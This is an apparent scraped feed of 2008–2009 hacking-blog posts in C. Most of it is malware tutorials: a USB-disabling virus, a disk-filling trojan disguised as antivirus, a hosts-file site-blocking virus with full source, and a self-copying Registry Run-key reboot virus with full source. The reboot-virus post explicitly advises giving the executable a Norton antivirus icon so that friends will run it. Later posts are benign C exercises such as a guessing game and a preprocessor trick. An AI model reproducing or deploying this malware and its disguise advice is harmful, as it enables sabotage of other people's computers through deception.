Go Hacking » C SOURCE CODES

A Virus Program to Disable USB Ports

Srikanth — Sun, 19 Jul 2009 12:42:43 +0000

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.

block_usb.c (source code)
unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

I hope you like this post. Please pass your comments.

How to Make a Trojan Horse

Srikanth — Sun, 05 Apr 2009 13:41:12 +0000

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.

How to compile, test and remove the damage?

Compilation:

For step-by-step compilation guide, refer my post How to compile C Programs.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%\system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?

Please pass your comments and tell me your opinion. I am just waiting for your comments…

A Virus Program to Block Websites

Srikanth — Fri, 21 Nov 2008 03:46:00 +0000

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?

Here is the sourcecode of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?

For step-by-step compilation guide, refer my post How to compile C Programs.

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.

%windir%\system32\drivers\etc

4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1 google.com

5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

A Virus Program to Restart the Computer at Every Startup

Srikanth — Fri, 17 Oct 2008 03:49:00 +0000

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System

(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

File Embedder Project in C

Srikanth — Mon, 21 Jul 2008 08:40:00 +0000

Some times it is necessary for our compiled project to have it’s supporting files embedded within the EXE module itself so that the supporting files may not be put into a seperate folder and carried along with the project. So here I am presenting you with the source code of the FILE EMBEDDER UTILITY project.

This utility can be used to embed one file with in the other. ie: Suppose we need to embed a .bat file(or any other file *.exe,*bmp,.txt…..) into our final project so that the batch file is present with in the compiled module and is hidden from the users avoiding tthe need to carry the .bat file every time with the project.

Both the Embedding and extraction process has been presented in seperate functions for your convenience. Here’s the code…..

#include
#include
#include
#include
#include
#include
#include

void embed(void);
void extract(void);

char buff[1],sname[128],tname[128],dname[128],choice;
unsigned long int size=0;long int psize=0;int outh,bytes=0;
FILE *source,*target,*data;

void main()
{
while(1)
{
clrscr();
puts(“\n\n\t\t\tFILE EMBEDDING UTILITY BY SRIKANTH\n\n\n”);
puts(“1.Embed A File 2. Extract A File 3.Exit\n”);
choice=getch();
switch(choice)
{
case ’1′:embed();
getch();
break;
case ’2′:
extract();
getch();
break;
default:
exit(0);
}
}
}

void embed()
{
puts(“\nEnter The Source Filename\n”);
scanf(“%s”,sname);
source=fopen(sname,”rb+”);
if(source==NULL)
{
puts(“\nCannot Open The Source File\n”);
return;
}
puts(“\nEnter The Target Filename\n”);
scanf(“%s”,tname);
outh=open(tname,O_RDONLYO_BINARY);
if(outh==-1)
{
puts(“\nCannot Open The Target File\n”);
return;
}
printf(“\nReading The Source File Please Wait…\n”);
while((bytes=read(outh,buff,1))>0)
size+=bytes;
data=fopen(“Data.cfg”,”w”);
if(data==NULL)
{
puts(“\nCannot Create Configuration The File\n”);
return;
}
fprintf(data,”%lu”,size);
close(outh);
fclose(data);
target=fopen(tname,”rb”);
if(target==NULL)
{
puts(“Cannot Open Target File\n”);
return;
}
printf(“\nEmbedding Please Wait…\n”);
fseek(source,0,SEEK_END);
while(fread(buff,1,1,target)>0)
fwrite(buff,1,1,source);
fcloseall();
printf(“\nEmbedding Completed Successfully\n”);
}

void extract()
{
printf(“\nEnter The Source Filename\n”);
scanf(“%s”,sname);
source=fopen(sname,”rb”);
if(source==NULL)
{
printf(“\nCannot Open The Source File\n”);
return;
}
printf(“\nEnter The Target Filename(eg: abc.exe)\n”);
scanf(“%s”,tname);
printf(“\nEnter The Configuration Filename(eg: DATA.cfg)\n”);
scanf(“%s”,dname);
data=fopen(dname,”r”);
if(data==NULL)
{
printf(“\nConfiguration File Not Found\n”);
return;
}
fscanf(data,”%ld”,&psize);
target=fopen(tname,”wb”);
if(target==NULL)
{
puts(“\nCannot Open The Target File\n”);
return;
}
printf(“\nExtracting Please Wait…\n”);
fseek(source,-psize,SEEK_END);
while((fread(buff,1,1,source))>0)
fwrite(buff,1,1,target);
printf(“\nFile Extraction Completed Successfully\n”);
fcloseall();
}

YOU CAN DOWNLOAD THE COMPILED MODULE OF THE ABOVE CODE HERE

C Program Without a Main Function

Srikanth — Sun, 02 Mar 2008 20:20:00 +0000

How to write a C program without a main function?. Is it possible to do that. Yes there can be a C program without a main function. Here’s the code of the program without a main function…

#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()
{
printf(” hello “);
}

Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, whats the logic behind it? How can we have a C program working without main?

Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main. But in reality it runs with a hidden main function.

The ‘##‘ operator is called the token pasting or token merging operator. That is we can merge two or more characters with it.

NOTE: A Preprocessor is program which processess the source code before compilation.

Look at the 2nd line of program -

#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here. The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut). The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).

Now look at the third line of the program -

#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line the argument must be expanded so that the 4th,1st,3rd & the 2nd characters must be merged. In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.

So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler. That’s it…

The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exists a hidden main function in the program. Here we are using the proprocessor directive to intelligently replace the word begin” by “main”. In simple words int begin=int main.

Guessing Game In C

Srikanth — Sat, 01 Mar 2008 08:14:00 +0000

This is a small guessing game written in C. In this guessing game you have to guess a number between 0 & 100. You have 8 chances to do that. Every time you guess wrongly the program will give you a hint that your guess is too high or your guess is too low. Based on this hint you have to guess the number in the remaining attempts. Here’s the code

#include
#include
#include

void main()
{
int num,guess=-1,tries=0,pass=0;
time_t t;
srand((unsigned)time(&t));
num=rand()%100;
while((guess!=num)&&tries<8)
{
printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)\n”,(8-tries)); scanf(“%d”,&guess);
tries++;
if(guess==num)
{
printf(“Hurray you guessed it correctly!!!\n”);
pass=1;
}
else if(num< guess)
printf(“Your guess is too high\n”);
else
printf(“Your guess is too low\n”);
}
if(pass==0)
printf(“Sorry you lost! The correct number is %d\n”,num);
}

A Self Destructing Program in C

Srikanth — Sat, 01 Mar 2008 07:35:00 +0000

This program will destroy itself upon execution. The program will cause the .exe file to be deleted upon execution. That is this program is capable of destroying itself upon execution. Here is the code

#include
#include
#include
void main()
{
printf(“This program will destroy itself if u press any key!!!\n”);
getch();
remove(_argv[0]);/*array of pointers to command line arguments*/
}

HOW TO COMPILE ?

Load the source code to the compiler and compile (press Alt-F9) and then press F9. This will generate the .exe file in the current directory (Bin directory). Execute this .exe file it will destroy itself upon execution.

C Program for Pigeon Breeding Problem

Srikanth — Thu, 28 Feb 2008 16:33:00 +0000

The problem is as follows…
Initially I have a pair of adult pigeons (capable of breeding) which give rise to another young pair every month until it reaches the age of 5 years (60 months). But the young pair starts breeding only when it is 2 months old. Once the adult pigeon pair starts breeding it never stops untils the age of 5 years. Assume the age of initial adult pigeon is 2 months old. This program takes the no. of months as input and will calculate the total no. of pigeons over a given time (as given by the input). This problem is framed, based on my own imagination and I call this problem as PIGEON BREEDING PROBLEM. Here is the code

#include
#include

struct node
{
int age;
struct node *link;
};

typedef struct node* NODE;

NODE getnode()
{
NODE x;
x=(NODE)malloc(sizeof(struct node));
if(x==NULL)
{
printf(“Out of memory\n”);
exit(1);
}
return x;
}

void main()
{
unsigned long int count=1;
unsigned int months,i;
NODE first=getnode();/*this is the intial adult pair*/
first->age=2; /*assume the age of initial adult pair as 2*/
first->link=NULL;
printf(“Enter the no. of months\n”);
scanf(“%u”,&months);
for(i=0;iage>=2)&&(temp->age<=60)) { NODE temp1=getnode(); temp->age+=1;
temp1->age=1;
temp1->link=first;
first=temp1;
temp=temp->link;
++count;
}
else
{
temp->age+=1;
temp=temp->link;
}
}
}
printf(“Total no. of pairs after %u months=%ld\n”,months,count);
}

C Program to Set/Change the Current System Date

Srikanth — Wed, 16 Jan 2008 13:56:00 +0000

This program can be used to set the system date or to change the current system date.

#include
#include
#include

int main(void)
{
struct date reset;
struct date save_date;
getdate(&save_date);
printf(“Original date:\n”);
system(“date”);
reset.da_year = 2001;
reset.da_day = 1;
reset.da_mon = 1;
setdate(&reset);
printf(“Date after setting:\n”);
system(“date”);
setdate(&save_date);
printf(“Back to original date:\n”);
system(“date”);
return 0;
}